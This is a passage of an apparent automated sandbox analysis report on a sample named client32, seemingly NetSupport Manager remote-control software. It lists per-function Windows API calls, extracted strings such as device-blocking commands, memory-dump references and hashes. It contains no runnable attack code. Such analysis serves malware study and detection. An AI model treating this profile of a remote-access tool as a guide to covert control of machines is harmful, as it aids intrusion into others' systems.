                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61
                                                                                                                                                                                                    Function 1100D570 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D58F,?), ref: 110EBBF0
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D58F,?), ref: 110EBC02
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D58F,?), ref: 110EBC14
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D5A7
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5C0
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 1100D5CF
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D5DF
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1100D600
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1100D611
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D649
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D661
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D66A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                                                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                                                                    • API String ID: 1760462761-4146734959
                                                                                                                                                                                                    • Opcode ID: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
                                                                                                                                                                                                    • Instruction ID: a456dda971beae3ede1202bfd149c5043837a25f7bf8d7d11396327520b54e87
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE218675E41329ABEB60DBE4CC89FDEB77C9B04708F108195F719A71C0DAB0AA448F65
                                                                                                                                                                                                    Function 110A75B0 Relevance: 18.1, APIs: 12, Instructions: 117windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110A75D6
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110A75E2
                                                                                                                                                                                                    • GetRgnBox.GDI32(?,?), ref: 110A7603
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110A7622
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110A7638
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00FF0062), ref: 110A7667
                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,?), ref: 110A7682
                                                                                                                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 110A7693
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110A76B3
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110A76BE
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110A76C5
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110A76D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CompatibleCreateObject$BitmapClipDeleteOffsetRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1998184411-0
                                                                                                                                                                                                    • Opcode ID: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
                                                                                                                                                                                                    • Instruction ID: d01220f1ca20b58af6d54b71fb89cfd4fca4eb7da2e1d7c7476d03a363cea98d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C841EA75A00616AFD715CFA8C889EBFBBB9FB8C705F108559FA15A3244CB35AC01CB61
                                                                                                                                                                                                    Function 687E2BD6 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 486COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __forcdecpt_l_isleadbyte_l_mbtowc_l_strlen
                                                                                                                                                                                                    • String ID: $g
                                                                                                                                                                                                    • API String ID: 3157115575-3845294767
                                                                                                                                                                                                    • Opcode ID: 36707a3e2a5628296dca1a9f31a68177c4e25ce453fd791f432a5fe6222f307d
                                                                                                                                                                                                    • Instruction ID: 975ad1769f69acbb9794a6a50c56faa06a415f72ef5ea08f57d33a26fac68372
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36707a3e2a5628296dca1a9f31a68177c4e25ce453fd791f432a5fe6222f307d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6227DF1D0462DCADB208F18CE8C799B7B4AB05318F9041E9F768A7261D7749AC5CF68
                                                                                                                                                                                                    Function 1113B200 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1113B29B
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1113B2B0
                                                                                                                                                                                                    • SetPropA.USER32(?,?,00000000), ref: 1113B33E
                                                                                                                                                                                                    • GetPropA.USER32(?), ref: 1113B34D
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1113B37F
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1113B3B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$wsprintf$Exception@8RemoveThrow_memsetstd::exception::exception
                                                                                                                                                                                                    • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                                                    • API String ID: 1006086998-1590351400
                                                                                                                                                                                                    • Opcode ID: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
                                                                                                                                                                                                    • Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5
                                                                                                                                                                                                    Function 11059020 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 164synchronizationtimeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,24DE4E77), ref: 11059069
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110590CE
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110590FC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11059136
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
                                                                                                                                                                                                    • String ID: @r$_License$maxslaves
                                                                                                                                                                                                    • API String ID: 3724810986-2836753679
                                                                                                                                                                                                    • Opcode ID: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
                                                                                                                                                                                                    • Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1
                                                                                                                                                                                                    Function 1103D180 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 146COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
                                                                                                                                                                                                    • IsA(), xrefs: 1103D284
                                                                                                                                                                                                    • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
                                                                                                                                                                                                    • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
                                                                                                                                                                                                    • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
                                                                                                                                                                                                    • SETOPTICALDRIVEACCESS, xrefs: 1103D214
                                                                                                                                                                                                    • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
                                                                                                                                                                                                    • BLOCKPRINTING, xrefs: 1103D23D
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                                                    • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 4104443479-1830555902
                                                                                                                                                                                                    • Opcode ID: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
                                                                                                                                                                                                    • Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1
                                                                                                                                                                                                    Function 68820856 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 68820889
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 6882088F
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 68820892
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6882089C
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 688208B4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(688138A8,68880C0C,?), ref: 688208C2
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR100(0000000C,688138A8,68880C0C,?), ref: 688208C9
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(688138A8,68880C0C,?), ref: 688208DC
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6882092E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentProcess$??2@AcquireConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@DuplicateErrorExceptionHandleLastLock@details@ReaderThrowWrite@_Writerstd::exception::exception
                                                                                                                                                                                                    • String ID: eventObject
                                                                                                                                                                                                    • API String ID: 1946344800-1680012138
                                                                                                                                                                                                    • Opcode ID: 6176bd2fa41af6e340e9dbcc560229ac7e7df25a8b23bffe64ae04dd6e72da4b
                                                                                                                                                                                                    • Instruction ID: 2bd856b58c00fe2a685455103988dbf33bfc863bfb512e90ff4466a8e814de5b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6176bd2fa41af6e340e9dbcc560229ac7e7df25a8b23bffe64ae04dd6e72da4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6319EB5A00219EFDB10DFA8C994A9EBBF8FF09350B90492AE425D7640D770E954CBE0
                                                                                                                                                                                                    Function 11045364 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544
                                                                                                                                                                                                    • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FreeString
                                                                                                                                                                                                    • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                                                                                                                                                    • API String ID: 2011556836-2400621309
                                                                                                                                                                                                    • Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
